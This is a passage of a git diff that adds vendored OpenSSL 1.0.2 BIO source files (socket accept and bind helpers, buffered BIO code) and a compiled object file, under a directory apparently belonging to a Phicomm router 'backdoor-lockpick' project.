+                             const struct addrinfo *, struct addrinfo **);
+        } p_getaddrinfo = {
+            NULL
+        };
+        static union {
+            void *p;
+            void (WSAAPI *f) (struct addrinfo *);
+        } p_freeaddrinfo = {
+            NULL
+        };
+        struct addrinfo *res, hint;
+
+        if (p_getaddrinfo.p == NULL) {
+            if ((p_getaddrinfo.p = DSO_global_lookup("getaddrinfo")) == NULL
+                || (p_freeaddrinfo.p =
+                    DSO_global_lookup("freeaddrinfo")) == NULL)
+                p_getaddrinfo.p = (void *)-1;
+        }
+        if (p_getaddrinfo.p == (void *)-1)
+            break;
+
+        /*
+         * '::port' enforces IPv6 wildcard listener. Some OSes, e.g. Solaris,
+         * default to IPv6 without any hint. Also note that commonly IPv6
+         * wildchard socket can service IPv4 connections just as well...
+         */
+        memset(&hint, 0, sizeof(hint));
+        hint.ai_flags = AI_PASSIVE;
+        if (h) {
+            if (strchr(h, ':')) {
+                if (h[1] == '\0')
+                    h = NULL;
+#  if OPENSSL_USE_IPV6
+                hint.ai_family = AF_INET6;
+#  else
+                h = NULL;
+#  endif
+            } else if (h[0] == '*' && h[1] == '\0') {
+                hint.ai_family = AF_INET;
+                h = NULL;
+            }
+        }
+
+        if ((*p_getaddrinfo.f) (h, p, &hint, &res))
+            break;
+
+        addrlen = res->ai_addrlen <= sizeof(server) ?
+            res->ai_addrlen : sizeof(server);
+        memcpy(&server, res->ai_addr, addrlen);
+
+        (*p_freeaddrinfo.f) (res);
+        goto again;
+    } while (0);
+# endif
+
+    if (!BIO_get_port(p, &port))
+        goto err;
+
+    memset((char *)&server, 0, sizeof(server));
+    server.sa_in.sin_family = AF_INET;
+    server.sa_in.sin_port = htons(port);
+    addrlen = sizeof(server.sa_in);
+
+    if (h == NULL || strcmp(h, "*") == 0)
+        server.sa_in.sin_addr.s_addr = INADDR_ANY;
+    else {
+        if (!BIO_get_host_ip(h, &(ip[0])))
+            goto err;
+        l = (unsigned long)
+            ((unsigned long)ip[0] << 24L) |
+            ((unsigned long)ip[1] << 16L) |
+            ((unsigned long)ip[2] << 8L) | ((unsigned long)ip[3]);
+        server.sa_in.sin_addr.s_addr = htonl(l);
+    }
+
+ again:
+    s = socket(server.sa.sa_family, SOCK_STREAM, SOCKET_PROTOCOL);
+    if (s == INVALID_SOCKET) {
+        SYSerr(SYS_F_SOCKET, get_last_socket_error());
+        ERR_add_error_data(3, "port='", host, "'");
+        BIOerr(BIO_F_BIO_GET_ACCEPT_SOCKET, BIO_R_UNABLE_TO_CREATE_SOCKET);
+        goto err;
+    }
+# ifdef SO_REUSEADDR
+    if (bind_mode == BIO_BIND_REUSEADDR) {
+        int i = 1;
+
+        ret = setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&i, sizeof(i));
+        bind_mode = BIO_BIND_NORMAL;
+    }
+# endif
+    if (bind(s, &server.sa, addrlen) == -1) {
+# ifdef SO_REUSEADDR
+        err_num = get_last_socket_error();
+        if ((bind_mode == BIO_BIND_REUSEADDR_IF_UNUSED) &&
+#  ifdef OPENSSL_SYS_WINDOWS
+            /*
+             * Some versions of Windows define EADDRINUSE to a dummy value.
+             */
+            (err_num == WSAEADDRINUSE))
+#  else
+            (err_num == EADDRINUSE))
+#  endif
+        {
+            client = server;
+            if (h == NULL || strcmp(h, "*") == 0) {
+#  if OPENSSL_USE_IPV6
+                if (client.sa.sa_family == AF_INET6) {
+                    memset(&client.sa_in6.sin6_addr, 0,
+                           sizeof(client.sa_in6.sin6_addr));
+                    client.sa_in6.sin6_addr.s6_addr[15] = 1;
+                } else
+#  endif
+                if (client.sa.sa_family == AF_INET) {
+                    client.sa_in.sin_addr.s_addr = htonl(0x7F000001);
+                } else
+                    goto err;
+            }
+            cs = socket(client.sa.sa_family, SOCK_STREAM, SOCKET_PROTOCOL);
+            if (cs != INVALID_SOCKET) {
+                int ii;
+                ii = connect(cs, &client.sa, addrlen);
+                closesocket(cs);
+                if (ii == INVALID_SOCKET) {
+                    bind_mode = BIO_BIND_REUSEADDR;
+                    closesocket(s);
+                    goto again;
+                }
+                /* else error */
+            }
+            /* else error */
+        }
+# endif
+        SYSerr(SYS_F_BIND, err_num);
+        ERR_add_error_data(3, "port='", host, "'");
+        BIOerr(BIO_F_BIO_GET_ACCEPT_SOCKET, BIO_R_UNABLE_TO_BIND_SOCKET);
+        goto err;
+    }
+    if (listen(s, MAX_LISTEN) == -1) {
+        SYSerr(SYS_F_BIND, get_last_socket_error());
+        ERR_add_error_data(3, "port='", host, "'");
+        BIOerr(BIO_F_BIO_GET_ACCEPT_SOCKET, BIO_R_UNABLE_TO_LISTEN_SOCKET);
+        goto err;
+    }
+    ret = 1;
+ err:
+    if (str != NULL)
+        OPENSSL_free(str);
+    if ((ret == 0) && (s != INVALID_SOCKET)) {
+        closesocket(s);
+        s = INVALID_SOCKET;
+    }
+    return (s);
+}
+
+int BIO_accept(int sock, char **addr)
+{
+    int ret = INVALID_SOCKET;
+    unsigned long l;
+    unsigned short port;
+    char *p;
+
+    struct {
+        /*
+         * As for following union. Trouble is that there are platforms
+         * that have socklen_t and there are platforms that don't, on
+         * some platforms socklen_t is int and on some size_t. So what
+         * one can do? One can cook #ifdef spaghetti, which is nothing
+         * but masochistic. Or one can do union between int and size_t.
+         * One naturally does it primarily for 64-bit platforms where
+         * sizeof(int) != sizeof(size_t). But would it work? Note that
+         * if size_t member is initialized to 0, then later int member
+         * assignment naturally does the job on little-endian platforms
+         * regardless accept's expectations! What about big-endians?
+         * If accept expects int*, then it works, and if size_t*, then
+         * length value would appear as unreasonably large. But this
+         * won't prevent it from filling in the address structure. The
+         * trouble of course would be if accept returns more data than
+         * actual buffer can accomodate and overwrite stack... That's
+         * where early OPENSSL_assert comes into picture. Besides, the
+         * only 64-bit big-endian platform found so far that expects
+         * size_t* is HP-UX, where stack grows towards higher address.
+         * <appro>
+         */
+        union {
+            size_t s;
+            int i;
+        } len;
+        union {
+            struct sockaddr sa;
+            struct sockaddr_in sa_in;
+# if OPENSSL_USE_IPV6
+            struct sockaddr_in6 sa_in6;
+# endif
+        } from;
+    } sa;
+
+    sa.len.s = 0;
+    sa.len.i = sizeof(sa.from);
+    memset(&sa.from, 0, sizeof(sa.from));
+    ret = accept(sock, &sa.from.sa, (void *)&sa.len);
+    if (sizeof(sa.len.i) != sizeof(sa.len.s) && sa.len.i == 0) {
+        OPENSSL_assert(sa.len.s <= sizeof(sa.from));
+        sa.len.i = (int)sa.len.s;
+        /* use sa.len.i from this point */
+    }
+    if (ret == INVALID_SOCKET) {
+        if (BIO_sock_should_retry(ret))
+            return -2;
+        SYSerr(SYS_F_ACCEPT, get_last_socket_error());
+        BIOerr(BIO_F_BIO_ACCEPT, BIO_R_ACCEPT_ERROR);
+        goto end;
+    }
+
+    if (addr == NULL)
+        goto end;
+
+# ifdef EAI_FAMILY
+    do {
+        char h[NI_MAXHOST], s[NI_MAXSERV];
+        size_t nl;
+        static union {
+            void *p;
+            int (WSAAPI *f) (const struct sockaddr *, size_t /* socklen_t */ ,
+                             char *, size_t, char *, size_t, int);
+        } p_getnameinfo = {
+            NULL
+        };
+        /*
+         * 2nd argument to getnameinfo is specified to be socklen_t.
+         * Unfortunately there is a number of environments where socklen_t is
+         * not defined. As it's passed by value, it's safe to pass it as
+         * size_t... <appro>
+         */
+
+        if (p_getnameinfo.p == NULL) {
+            if ((p_getnameinfo.p = DSO_global_lookup("getnameinfo")) == NULL)
+                p_getnameinfo.p = (void *)-1;
+        }
+        if (p_getnameinfo.p == (void *)-1)
+            break;
+
+        if ((*p_getnameinfo.f) (&sa.from.sa, sa.len.i, h, sizeof(h), s,
+                                sizeof(s), NI_NUMERICHOST | NI_NUMERICSERV))
+            break;
+        nl = strlen(h) + strlen(s) + 2;
+        p = *addr;
+        if (p) {
+            *p = '\0';
+            p = OPENSSL_realloc(p, nl);
+        } else {
+            p = OPENSSL_malloc(nl);
+        }
+        if (p == NULL) {
+            BIOerr(BIO_F_BIO_ACCEPT, ERR_R_MALLOC_FAILURE);
+            goto end;
+        }
+        *addr = p;
+        BIO_snprintf(*addr, nl, "%s:%s", h, s);
+        goto end;
+    } while (0);
+# endif
+    if (sa.from.sa.sa_family != AF_INET)
+        goto end;
+    l = ntohl(sa.from.sa_in.sin_addr.s_addr);
+    port = ntohs(sa.from.sa_in.sin_port);
+    if (*addr == NULL) {
+        if ((p = OPENSSL_malloc(24)) == NULL) {
+            BIOerr(BIO_F_BIO_ACCEPT, ERR_R_MALLOC_FAILURE);
+            goto end;
+        }
+        *addr = p;
+    }
+    BIO_snprintf(*addr, 24, "%d.%d.%d.%d:%d",
+                 (unsigned char)(l >> 24L) & 0xff,
+                 (unsigned char)(l >> 16L) & 0xff,
+                 (unsigned char)(l >> 8L) & 0xff,
+                 (unsigned char)(l) & 0xff, port);
+ end:
+    return (ret);
+}
+
+int BIO_set_tcp_ndelay(int s, int on)
+{
+    int ret = 0;
+# if defined(TCP_NODELAY) && (defined(IPPROTO_TCP) || defined(SOL_TCP))
+    int opt;
+
+#  ifdef SOL_TCP
+    opt = SOL_TCP;
+#  else
+#   ifdef IPPROTO_TCP
+    opt = IPPROTO_TCP;
+#   endif
+#  endif
+
+    ret = setsockopt(s, opt, TCP_NODELAY, (char *)&on, sizeof(on));
+# endif
+    return (ret == 0);
+}
+
+int BIO_socket_nbio(int s, int mode)
+{
+    int ret = -1;
+    int l;
+
+    l = mode;
+# ifdef FIONBIO
+    ret = BIO_socket_ioctl(s, FIONBIO, &l);
+# endif
+    return (ret == 0);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_sock.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_sock.o
new file mode 100644
index 0000000000000000000000000000000000000000..434cca4ef20e1ad170155d56ae7bdc687e70c275
GIT binary patch
literal 10360
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
azQZtwIRbaOx%m5$?5I3oKT5Te|Nj92_dNOl

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_buff.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_buff.c
new file mode 100644
index 0000000..478fa16
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_buff.c
@@ -0,0 +1,517 @@
+/* crypto/bio/bf_buff.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+static int buffer_write(BIO *h, const char *buf, int num);
+static int buffer_read(BIO *h, char *buf, int size);
+static int buffer_puts(BIO *h, const char *str);
+static int buffer_gets(BIO *h, char *str, int size);
+static long buffer_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int buffer_new(BIO *h);
+static int buffer_free(BIO *data);
+static long buffer_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+#define DEFAULT_BUFFER_SIZE     4096
+
+static BIO_METHOD methods_buffer = {
+    BIO_TYPE_BUFFER,
+    "buffer",
+    buffer_write,
+    buffer_read,
+    buffer_puts,
+    buffer_gets,
+    buffer_ctrl,
+    buffer_new,
+    buffer_free,
+    buffer_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_buffer(void)
+{
+    return (&methods_buffer);
+}
+
+static int buffer_new(BIO *bi)
+{
+    BIO_F_BUFFER_CTX *ctx;
+
+    ctx = (BIO_F_BUFFER_CTX *)OPENSSL_malloc(sizeof(BIO_F_BUFFER_CTX));
+    if (ctx == NULL)
+        return (0);
+    ctx->ibuf = (char *)OPENSSL_malloc(DEFAULT_BUFFER_SIZE);
+    if (ctx->ibuf == NULL) {
+        OPENSSL_free(ctx);
+        return (0);
+    }
+    ctx->obuf = (char *)OPENSSL_malloc(DEFAULT_BUFFER_SIZE);
+    if (ctx->obuf == NULL) {
+        OPENSSL_free(ctx->ibuf);
+        OPENSSL_free(ctx);
+        return (0);
+    }
+    ctx->ibuf_size = DEFAULT_BUFFER_SIZE;
+    ctx->obuf_size = DEFAULT_BUFFER_SIZE;
+    ctx->ibuf_len = 0;
+    ctx->ibuf_off = 0;
+    ctx->obuf_len = 0;
+    ctx->obuf_off = 0;
+
+    bi->init = 1;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return (1);
+}
+
+static int buffer_free(BIO *a)
+{
+    BIO_F_BUFFER_CTX *b;
+
+    if (a == NULL)
+        return (0);
+    b = (BIO_F_BUFFER_CTX *)a->ptr;
+    if (b->ibuf != NULL)
+        OPENSSL_free(b->ibuf);
+    if (b->obuf != NULL)
+        OPENSSL_free(b->obuf);
+    OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int buffer_read(BIO *b, char *out, int outl)
+{
+    int i, num = 0;
+    BIO_F_BUFFER_CTX *ctx;
+
+    if (out == NULL)
+        return (0);
+    ctx = (BIO_F_BUFFER_CTX *)b->ptr;
+
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+    num = 0;
+    BIO_clear_retry_flags(b);
+
+ start:
+    i = ctx->ibuf_len;
+    /* If there is stuff left over, grab it */
+    if (i != 0) {
+        if (i > outl)
+            i = outl;
+        memcpy(out, &(ctx->ibuf[ctx->ibuf_off]), i);
+        ctx->ibuf_off += i;
+        ctx->ibuf_len -= i;
+        num += i;
+        if (outl == i)
+            return (num);
+        outl -= i;
+        out += i;
+    }
+
+    /*
+     * We may have done a partial read. try to do more. We have nothing in
+     * the buffer. If we get an error and have read some data, just return it
+     * and let them retry to get the error again. copy direct to parent
+     * address space
+     */
+    if (outl > ctx->ibuf_size) {
+        for (;;) {
+            i = BIO_read(b->next_bio, out, outl);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+                if (i < 0)
+                    return ((num > 0) ? num : i);
+                if (i == 0)
+                    return (num);
+            }
+            num += i;
+            if (outl == i)
+                return (num);
+            out += i;
+            outl -= i;
+        }
+    }
+    /* else */
+
+    /* we are going to be doing some buffering */
+    i = BIO_read(b->next_bio, ctx->ibuf, ctx->ibuf_size);
+    if (i <= 0) {
+        BIO_copy_next_retry(b);
+        if (i < 0)
+            return ((num > 0) ? num : i);
+        if (i == 0)
+            return (num);
+    }
+    ctx->ibuf_off = 0;
+    ctx->ibuf_len = i;
+
+    /* Lets re-read using ourselves :-) */
+    goto start;
+}
+
+static int buffer_write(BIO *b, const char *in, int inl)
+{
+    int i, num = 0;
+    BIO_F_BUFFER_CTX *ctx;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    ctx = (BIO_F_BUFFER_CTX *)b->ptr;
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+
+    BIO_clear_retry_flags(b);
+ start:
+    i = ctx->obuf_size - (ctx->obuf_len + ctx->obuf_off);
+    /* add to buffer and return */
+    if (i >= inl) {
+        memcpy(&(ctx->obuf[ctx->obuf_off + ctx->obuf_len]), in, inl);
+        ctx->obuf_len += inl;
+        return (num + inl);
+    }
+    /* else */
+    /* stuff already in buffer, so add to it first, then flush */
+    if (ctx->obuf_len != 0) {
+        if (i > 0) {            /* lets fill it up if we can */
+            memcpy(&(ctx->obuf[ctx->obuf_off + ctx->obuf_len]), in, i);
+            in += i;
+            inl -= i;
+            num += i;
+            ctx->obuf_len += i;
+        }
+        /* we now have a full buffer needing flushing */
+        for (;;) {
+            i = BIO_write(b->next_bio, &(ctx->obuf[ctx->obuf_off]),
+                          ctx->obuf_len);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+
+                if (i < 0)
+                    return ((num > 0) ? num : i);
+                if (i == 0)
+                    return (num);
+            }
+            ctx->obuf_off += i;
+            ctx->obuf_len -= i;
+            if (ctx->obuf_len == 0)
+                break;
+        }
+    }
+    /*
+     * we only get here if the buffer has been flushed and we still have
+     * stuff to write
+     */
+    ctx->obuf_off = 0;
+
+    /* we now have inl bytes to write */
+    while (inl >= ctx->obuf_size) {
+        i = BIO_write(b->next_bio, in, inl);
+        if (i <= 0) {
+            BIO_copy_next_retry(b);
+            if (i < 0)
+                return ((num > 0) ? num : i);
+            if (i == 0)
+                return (num);
+        }
+        num += i;
+        in += i;
+        inl -= i;
+        if (inl == 0)
+            return (num);
+    }
+
+    /*
+     * copy the rest into the buffer since we have only a small amount left
+     */
+    goto start;
+}
+
+static long buffer_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO *dbio;
